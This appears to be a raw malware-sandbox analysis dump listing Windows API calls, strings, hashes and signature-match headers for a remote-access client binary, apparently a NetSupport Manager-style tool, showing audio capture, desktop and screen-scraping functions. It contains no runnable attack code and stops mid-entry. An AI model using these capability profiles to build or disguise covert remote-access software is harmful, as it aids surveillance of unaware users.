                                                                                    • _memset.LIBCMT ref: 11135335
                                                                                    • LoadIconA.USER32(00000000,00000455), ref: 11135403
                                                                                    • _strncpy.LIBCMT ref: 11135425
                                                                                    • Shell_NotifyIconA.SHELL32(00000000,000001E8,?,?,?,?,?,?,?,00000001,00000000,420B7E12,00000000,1102E392,00000001), ref: 11135436
                                                                                    • LoadIconA.USER32(00000000,0000045C), ref: 11135456
                                                                                    • GetWindowTextA.USER32(00030462,?,00000180), ref: 11135478
                                                                                    • wsprintfA.USER32 ref: 111354F4
                                                                                      • Part of subcall function 110D07C0: _free.LIBCMT ref: 110D07ED
                                                                                    • wsprintfA.USER32 ref: 1113552C
                                                                                    • wsprintfA.USER32 ref: 1113558D
                                                                                    • wsprintfA.USER32 ref: 111355E8
                                                                                    • Shell_NotifyIconA.SHELL32(1102D57D,000001E8,00000001,00000000,420B7E12,00000000,1102E392,00000001), ref: 11135623
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Iconwsprintf$LoadNotifyShell_$TextWindow__wcstoi64_free_memset_strncpy
                                                                                    • String ID: %s$%s%s$364339$Client$SysTray
                                                                                    • API String ID: 1881589080-2544040720
                                                                                    • Opcode ID: 52564186abc49f02ff9e416bc12bc90c7bb85710abbf43999a324a306af1717a
                                                                                    • Instruction ID: 2c8920b03c090074b43ba546e334978a2e83067bba728106ef80608c6d9e13b6
                                                                                    • Opcode Fuzzy Hash: 52564186abc49f02ff9e416bc12bc90c7bb85710abbf43999a324a306af1717a
                                                                                    • Instruction Fuzzy Hash: EAA15CB1D042159FDB62CF74CC50BAEF7B9BB44719F4045ACE829A7284EB71AA44CF50
                                                                                    APIs
                                                                                    Strings
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: wsprintf
                                                                                    • String ID: %s%s$Client$DecompressJPEGToBitmap$DecompressPNGToBitmap$ImageFile$ImageFileUser$PCIImage.dll
                                                                                    • API String ID: 2111968516-1286714176
                                                                                    • Opcode ID: 16156c97f269215458a29c73816be307994206807deff759477be4abbe46c0e1
                                                                                    • Instruction ID: cfced163e91c544f1d9a441fe05b752d20d9a2d0abefb67461bd630bfcd17819
                                                                                    • Opcode Fuzzy Hash: 16156c97f269215458a29c73816be307994206807deff759477be4abbe46c0e1
                                                                                    • Instruction Fuzzy Hash: 0C911975A50319AFEB11DFA4CD84FDAF3B4BF88725F1041A8E519A7284EB30AA40CF51
                                                                                    APIs
                                                                                      • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                    • _malloc.LIBCMT ref: 1100B366
                                                                                      • Part of subcall function 11162B51: __FF_MSGBANNER.LIBCMT ref: 11162B6A
                                                                                      • Part of subcall function 11162B51: __NMSG_WRITE.LIBCMT ref: 11162B71
                                                                                      • Part of subcall function 11162B51: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162B96
                                                                                      • Part of subcall function 1100AC40: EnterCriticalSection.KERNEL32(000000FF,420B7E12,?,00000000,00000000), ref: 1100AC84
                                                                                      • Part of subcall function 1100AC40: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1100ACA2
                                                                                      • Part of subcall function 1100AC40: GetProcAddress.KERNEL32(?,CancelIo), ref: 1100ACEE
                                                                                      • Part of subcall function 1100AC40: InterlockedExchange.KERNEL32(?,000000FF), ref: 1100AD35
                                                                                      • Part of subcall function 1100AC40: CloseHandle.KERNEL32(00000000), ref: 1100AD3C
                                                                                      • Part of subcall function 1100AC40: _free.LIBCMT ref: 1100AD53
                                                                                      • Part of subcall function 1100AC40: FreeLibrary.KERNEL32(?), ref: 1100AD6B
                                                                                      • Part of subcall function 1100AC40: LeaveCriticalSection.KERNEL32(?), ref: 1100AD75
                                                                                    • EnterCriticalSection.KERNEL32(1100CA5A,Audio,DisableSounds,00000000,00000000,420B7E12,?,1100CA4A,00000000,?,1100CA4A,?), ref: 1100B39B
                                                                                    • CreateFileA.KERNEL32(\\.\NSAudioFilter,C0000000,00000000,00000000,00000003,40000000,00000000,?,1100CA4A,?), ref: 1100B3B8
                                                                                    • _calloc.LIBCMT ref: 1100B3E9
                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,1100CA4A,?), ref: 1100B40F
                                                                                    • LeaveCriticalSection.KERNEL32(1100CA5A,?,1100CA4A,?), ref: 1100B449
                                                                                    • LeaveCriticalSection.KERNEL32(1100CA4A,?,?,1100CA4A,?), ref: 1100B46E
                                                                                    Strings
                                                                                    • Vista AddAudioCapEvtListener(%p), xrefs: 1100B4F3
                                                                                    • Audio, xrefs: 1100B347
                                                                                    • InitCaptureSounds NT6, xrefs: 1100B48E
                                                                                    • Error. Vista AddAudioCaptureEventListener ret %s, xrefs: 1100B51C
                                                                                    • Vista new pAudioCap=%p, xrefs: 1100B4D3
                                                                                    • \\.\NSAudioFilter, xrefs: 1100B3B0
                                                                                    • DisableSounds, xrefs: 1100B342
                                                                                    • Error. Vista AudioCapture GetInstance ret %s, xrefs: 1100B4C3
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$Leave$CreateEnterLibrary$AddressAllocateCloseEventExchangeFileFreeHandleHeapInterlockedLoadProc__wcstoi64_calloc_free_malloc
                                                                                    • String ID: Audio$DisableSounds$Error. Vista AudioCapture GetInstance ret %s$Error. Vista AddAudioCaptureEventListener ret %s$InitCaptureSounds NT6$Vista AddAudioCapEvtListener(%p)$Vista new pAudioCap=%p$\\.\NSAudioFilter
                                                                                    • API String ID: 1843377891-2362500394
                                                                                    • Opcode ID: f60393b41353c13c745924059a021ceb37060bf1a09b9967f753d73c688ee9b2
                                                                                    • Instruction ID: 3f9b0c4355a442be161718b687c517c7c1a8a488e2b9041c50d9e3709ff29e90
                                                                                    • Opcode Fuzzy Hash: f60393b41353c13c745924059a021ceb37060bf1a09b9967f753d73c688ee9b2
                                                                                    • Instruction Fuzzy Hash: 8E51D9B5E0464AAFE704CF74DC80BAEF7A4FB04759F10467AE929A3240E7717550C7A1
                                                                                    APIs
                                                                                    • CoInitialize.OLE32(00000000), ref: 1112523A
                                                                                    • SendMessageA.USER32(?,0000043C,00000000,?), ref: 11125251
                                                                                    • CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 11125280
                                                                                    • StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 111252B6
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    • OleCreateStaticFromData.OLE32(00000000,111C093C,00000002,?,?,?,?), ref: 111253C2
                                                                                    • OleSetContainedObject.OLE32(?,00000001), ref: 111253D8
                                                                                    • _memset.LIBCMT ref: 111253E5
                                                                                    • CoUninitialize.OLE32 ref: 11125499
                                                                                    Strings
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Create$BytesLockMessage$ContainedDataDocfileErrorExitFromGlobalInitializeLastObjectProcessSendStaticUninitialize_memsetwsprintf
                                                                                    • String ID: ..\CTL32\RichInsert.cpp$8$pLockBytes$pOleClientSite$pRichEditOle$pStorage
                                                                                    • API String ID: 1820880743-4036218486
                                                                                    • Opcode ID: b8f593f3550aa9e0f779f3b8c62ca3ee8f9d3103c1fcafdad78b4b8c3047e15f
                                                                                    • Instruction ID: 08d7bdd5ab5c60396c417d70c353951ed5684100983e189a7c8dd5e42ede2f0c
                                                                                    • Opcode Fuzzy Hash: b8f593f3550aa9e0f779f3b8c62ca3ee8f9d3103c1fcafdad78b4b8c3047e15f
                                                                                    • Instruction Fuzzy Hash: D69128B5E002599FDB54DFA8CCC4ADDF7B9FB88314F608169E519AB280EB70A941CB50
                                                                                    APIs
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    • GetLastError.KERNEL32(?), ref: 1102B331
                                                                                    • GetLastError.KERNEL32(?), ref: 1102B38E
                                                                                    • _fgets.LIBCMT ref: 1102B3C0
                                                                                    • _strtok.LIBCMT ref: 1102B3E8
                                                                                      • Part of subcall function 11163016: __getptd.LIBCMT ref: 11163034
                                                                                    • _fgets.LIBCMT ref: 1102B424
                                                                                    • _strtok.LIBCMT ref: 1102B438
                                                                                    Strings
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$_fgets_strtok$ExitMessageProcess__getptdwsprintf
                                                                                    • String ID: *LookupFile$IsA()$LookupFileUser$WARN: Could not open TS lookup file: "%s" (%d), user="%s"$WARN: LoginUser failed (%d) user="%s"$WARN: No TS lookup file specified!$WARN: clientname is empty!$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                    • API String ID: 78526175-1484737611
                                                                                    • Opcode ID: ff60ef9c488c2c79b08b3262712ada230bbec0adfdbeaabbc1cb1cc15ddf1ff7
                                                                                    • Instruction ID: 83a04ffa2f5f23a923324f4189043cfd8b751997b231b4d3af7dc0cd534076c2
                                                                                    • Opcode Fuzzy Hash: ff60ef9c488c2c79b08b3262712ada230bbec0adfdbeaabbc1cb1cc15ddf1ff7
                                                                                    • Instruction Fuzzy Hash: 2E81B675D00A1E9BDB10DBA4CC80FEEB7B9AF44309F4440D8E919A7245EA75AB84CF91
                                                                                    APIs
                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104,420B7E12,00000000,00000000,00000000), ref: 1103119A
                                                                                      • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                    • EnumWindows.USER32(110301B0,00000001), ref: 11031272
                                                                                    • EnumWindows.USER32(110301B0,00000000), ref: 110312CC
                                                                                    • Sleep.KERNEL32(00000014,?,?,?,?,?,00000000), ref: 110312DC
                                                                                    • Sleep.KERNEL32(?,?,?,?,?,?,00000000), ref: 11031313
                                                                                      • Part of subcall function 11027E50: _memset.LIBCMT ref: 11027E85
                                                                                      • Part of subcall function 11027E50: wsprintfA.USER32 ref: 11027EBA
                                                                                      • Part of subcall function 11027E50: WaitForSingleObject.KERNEL32(?,000000FF), ref: 11027EFF
                                                                                      • Part of subcall function 11027E50: GetExitCodeProcess.KERNEL32(?,?), ref: 11027F13
                                                                                      • Part of subcall function 11027E50: CloseHandle.KERNEL32(?,00000000), ref: 11027F45
                                                                                      • Part of subcall function 11027E50: CloseHandle.KERNEL32(?), ref: 11027F4E
                                                                                    • Sleep.KERNEL32(0000000A,?,?,?,?,?,00000000), ref: 1103132B
                                                                                    • SendMessageA.USER32(?,00000010,00000000,00000000), ref: 110313E7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                     • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: SleepWindows$CloseEnumHandle$CodeDirectoryExitMessageObjectProcessSendSingleWait__wcstoi64_memsetwsprintf
                                                                                    • String ID: "%sNSMExec.exe" %s$*ExitMetroDelay$Client$No new explorer wnd$\Explorer.exe$close new explorer wnd x%x
                                                                                    • API String ID: 3887438110-1852639040
                                                                                    • Opcode ID: dd4de2a7fc9d8cd5af608a89b0c8565785138ad2200bde7dfaaacefb5c936fd0
                                                                                    • Instruction ID: 68f8b224c7beedd47666692ff363fa6bc3684c9dbb57027410f782db2506f70a
                                                                                    • Opcode Fuzzy Hash: dd4de2a7fc9d8cd5af608a89b0c8565785138ad2200bde7dfaaacefb5c936fd0
                                                                                    • Instruction Fuzzy Hash: 3391D0B5E002299FDB14CF64DC80BEEF7F5AF89308F1441A9D9599B640EB30AE45CB91
                                                                                    APIs
                                                                                      • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                    • EnterCriticalSection.KERNEL32(?,View,limitcolorbits,00000000,00000000,420B7E12,111F00F8,111E5C98,?), ref: 110B3594
                                                                                    • UnionRect.USER32(?,?,?), ref: 110B3642
                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 110B37DD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterLeaveRectUnion__wcstoi64
                                                                                    • String ID: 8$Client$ScrapeBandwidth$ScrapeBandwidthPeriod$ScrapeBusyDelay$ScrapeNotBusyDelay$ScrapeSkipDelay$View$d$limitcolorbits
                                                                                    • API String ID: 3518726166-774679399
                                                                                    • Opcode ID: 0507bcf6a5bfb235a752924e3a90bf095b586a4feb6a764fbd151a6487f36d15
                                                                                    • Instruction ID: 5c973c881439576bbc97280a0c87cfab299b34d5c0027cf4f030de1918296fe0
                                                                                    • Opcode Fuzzy Hash: 0507bcf6a5bfb235a752924e3a90bf095b586a4feb6a764fbd151a6487f36d15
                                                                                    • Instruction Fuzzy Hash: E5911778E04219AFDB54CFA5C980BADFBF1FB48704F20816AE815AB380D735A941CF58
                                                                                    APIs
                                                                                      • Part of subcall function 1115ADD0: IsIconic.USER32(?), ref: 1115AE77
                                                                                      • Part of subcall function 1115ADD0: ShowWindow.USER32(?,00000009), ref: 1115AE87
                                                                                      • Part of subcall function 1115ADD0: BringWindowToTop.USER32(?), ref: 1115AE91
                                                                                    • CheckMenuItem.USER32(00000000,000013EB,-00000009), ref: 1102324D
                                                                                    • ShowWindow.USER32(?,00000003), ref: 110232D1
                                                                                    • LoadMenuA.USER32(00000000,000013A3), ref: 110233FB
                                                                                    • GetSubMenu.USER32(00000000,00000000), ref: 11023409
                                                                                    • CheckMenuItem.USER32(00000000,000013EB,?), ref: 11023429
                                                                                    • GetDlgItem.USER32(?,000013B2), ref: 1102343C
                                                                                    • GetWindowRect.USER32(00000000), ref: 11023443
                                                                                    • PostMessageA.USER32(?,00000111,?,00000000), ref: 11023499
                                                                                    • DestroyMenu.USER32(?,?,00000000,00000000,00000102,?,?,?,00000000), ref: 110234A3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Menu$Window$Item$CheckShow$BringDestroyIconicLoadMessagePostRect
                                                                                    • String ID: AddToJournal$Chat
                                                                                    • API String ID: 693070851-2976406578
                                                                                    • Opcode ID: d2fe2766ddb3d34030bb972f012e30f748b4f8edd59272365cd546290ab4e6ab
                                                                                    • Instruction ID: 337dba7d0f02a97e7c7211def3ec221287211942730252afe18814347e7ecccc
                                                                                    • Opcode Fuzzy Hash: d2fe2766ddb3d34030bb972f012e30f748b4f8edd59272365cd546290ab4e6ab
                                                                                    • Instruction Fuzzy Hash: 87A1F178B04616ABDB09DF74CC85FAEB3E5AB88704F504519EA26DF2C0CF74B9408B65
                                                                                    APIs
                                                                                      • Part of subcall function 11089280: UnhookWindowsHookEx.USER32(?), ref: 110892A3
                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 110272B4
                                                                                      • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                      • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                      • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000001F4), ref: 11027323
                                                                                    • PostMessageA.USER32(00030462,00000501,00000000,00000000), ref: 11027340
                                                                                    • SetEvent.KERNEL32(00000294), ref: 11027351
                                                                                    • Sleep.KERNEL32(00000032), ref: 11027359
                                                                                    • PostMessageA.USER32(00030462,00000800,00000000,00000000), ref: 1102738E
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 110273BA
                                                                                    • GetThreadDesktop.USER32(00000000), ref: 110273C1
                                                                                    • SetThreadDesktop.USER32(00000000), ref: 110273CA
                                                                                    • CloseDesktop.USER32(00000000), ref: 110273D5
                                                                                    • CloseHandle.KERNEL32(000003C8), ref: 11027415
                                                                                      • Part of subcall function 111100D0: GetCurrentThreadId.KERNEL32 ref: 11110166
                                                                                      • Part of subcall function 111100D0: InitializeCriticalSection.KERNEL32(-00000010,?,11031040,00000001,00000000), ref: 11110179
                                                                                      • Part of subcall function 111100D0: InitializeCriticalSection.KERNEL32(111F08F0,?,11031040,00000001,00000000), ref: 11110188
                                                                                      • Part of subcall function 111100D0: EnterCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111019C
                                                                                      • Part of subcall function 111100D0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031040), ref: 111101C2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Thread$CriticalDesktopEventSection$CloseCreateCurrentInitializeMessagePost$EnterHandleHookMultipleObjectsSleepUnhookWaitWindows_malloc_memsetwsprintf
                                                                                    • String ID: Async
                                                                                    • API String ID: 3276504616-2933828738
                                                                                    • Opcode ID: 7f34267c0eb402a5cecabe7481cb594ff7fa9432527a27f32e6b0a7f9cc990e4
                                                                                    • Instruction ID: b4c20aaf8d895fc577ef80b9cbd2db14a62b6b62bbca8aebe14e383436c97cb7
                                                                                    • Opcode Fuzzy Hash: 7f34267c0eb402a5cecabe7481cb594ff7fa9432527a27f32e6b0a7f9cc990e4
                                                                                    • Instruction Fuzzy Hash: 2641A174A056159FEB05DFF8C886BAEB7A4FB54718F804138E925DB6C4EB70B800CB51
                                                                                    APIs
                                                                                    • GetTickCount.KERNEL32 ref: 1110534D
                                                                                    • EnterCriticalSection.KERNEL32(111F060C,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 11105356
                                                                                    • GetTickCount.KERNEL32 ref: 1110535C
                                                                                    • GetTickCount.KERNEL32 ref: 1110538E
                                                                                    • LeaveCriticalSection.KERNEL32(111F060C,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 11105397
                                                                                    • EnterCriticalSection.KERNEL32(?,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 111053B8
                                                                                    • WriteFile.KERNEL32(00000000,1118C583,?,?,00000000,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF), ref: 111053D0
                                                                                    • LeaveCriticalSection.KERNEL32(?,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 111053DD
                                                                                    • GetTickCount.KERNEL32 ref: 111053EC
                                                                                    • LeaveCriticalSection.KERNEL32(111F060C,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 111053F5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$CountTick$Leave$Enter$FileWrite
                                                                                    • String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock
                                                                                    • API String ID: 831250470-625438208
                                                                                    • Opcode ID: 7549535bd9f32612e90d0c37b89a6aa1a9d576740b26f55eee6ebfb36c9c683f
                                                                                    • Instruction ID: 510883743b079e8f18b7a04972f4ca77f6f871929db96d85a9feff413df15827
                                                                                    • Opcode Fuzzy Hash: 7549535bd9f32612e90d0c37b89a6aa1a9d576740b26f55eee6ebfb36c9c683f
                                                                                    • Instruction Fuzzy Hash: F521F37AE10228ABDB009F759CC89AEFBADEB8972DB551075FC15CB204D6609C04CBA0
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: wsprintf
                                                                                    • String ID: AlreadyStarted$AlreadyStopped$BadParam$CannotGetFunc$CannotLoadDll$DllInitFailed$Exception$NoCapClients$NotFound$RequiresVista$StillInstances$Unknown error %d
                                                                                    • API String ID: 2111968516-2092292787
                                                                                    • Opcode ID: 68bb8bbd715fdcfb00972525606c57017de8997db1f0824372bcab7740fe05b1
                                                                                    • Instruction ID: d9a7d6ebd96fccb3ef7d6a30ae0c52648c54e2eaa592bb8290d406d227b44d1e
                                                                                    • Opcode Fuzzy Hash: 68bb8bbd715fdcfb00972525606c57017de8997db1f0824372bcab7740fe05b1
                                                                                    • Instruction Fuzzy Hash: B7F0623269520C47BA8087EC784053EF78D739217D7C88093F4ACFAF20E916DCA0A1A9
                                                                                    APIs
                                                                                    • GetVersion.KERNEL32(00000000,74DF0BD0,00000000), ref: 11137363
                                                                                    • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 11137384
                                                                                    • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 11137394
                                                                                    • GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 111373B1
                                                                                    • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoA), ref: 111373BD
                                                                                    • _memset.LIBCMT ref: 111373D7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc$Version_memset
                                                                                    • String ID: KERNEL32.DLL$Terminal Server$VerSetConditionMask$VerifyVersionInfoA$ntdll.dll
                                                                                    • API String ID: 1659045089-3162170060
                                                                                    • Opcode ID: 2782e45080b00d7644363843fb4dac8f82773bfcd6b8b8724ba95a014df5fc97
                                                                                    • Instruction ID: 0c0b10a14524f440857339b23279ac9494b8b75ce88d62c7832b422cfd240681
                                                                                    • Opcode Fuzzy Hash: 2782e45080b00d7644363843fb4dac8f82773bfcd6b8b8724ba95a014df5fc97
                                                                                    • Instruction Fuzzy Hash: CB216A70F10329ABF720AB71AD44F5AFFA99B8871AF000474E914A7189EA71B9048765
                                                                                    APIs
                                                                                    • GetDlgItem.USER32(?,00000001), ref: 1103910C
                                                                                    • IsWindowEnabled.USER32(00000000), ref: 11039113
                                                                                    • _memset.LIBCMT ref: 11039131
                                                                                    • GetDlgItemTextA.USER32(?,0000044D,?,00000080), ref: 11039183
                                                                                    • GetDlgItemTextA.USER32(?,0000044F,00000000,00000080), ref: 110391EB
                                                                                    • GetDlgItemTextA.USER32(?,000004BE,00000000,00000080), ref: 1103924E
                                                                                    • GetDlgItemTextA.USER32(?,000017EC,00000000,00000080), ref: 110392B1
                                                                                    • GetDlgItemTextA.USER32(?,0000048E,00000000,00000080), ref: 11039377
                                                                                    • GetDlgItemTextA.USER32(?,0000048D,00000000,00000080), ref: 11039314
                                                                                      • Part of subcall function 11142800: _strncpy.LIBCMT ref: 11142824
                                                                                      • Part of subcall function 11142290: _strncpy.LIBCMT ref: 111422D2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Item$Text$_strncpy$EnabledWindow_memset
                                                                                    • String ID:
                                                                                    • API String ID: 3085755443-3916222277
                                                                                    • Opcode ID: 3474633675772f1dfa7fa715227e202affa5940b04f40e4fcdf8bfab1e55feb6
                                                                                    • Instruction ID: 27c08bceae7d385fa57d2e1d5dbc2d5db1b5a631922e4fecc43e69d3347e8bff
                                                                                    • Opcode Fuzzy Hash: 3474633675772f1dfa7fa715227e202affa5940b04f40e4fcdf8bfab1e55feb6
                                                                                    • Instruction Fuzzy Hash: 6D819F75A10706ABE724DB74CC85F9AB3F9BF84704F50C598E2499B181DF71FA448BA0
                                                                                    APIs
                                                                                    • wsprintfA.USER32 ref: 1106F397
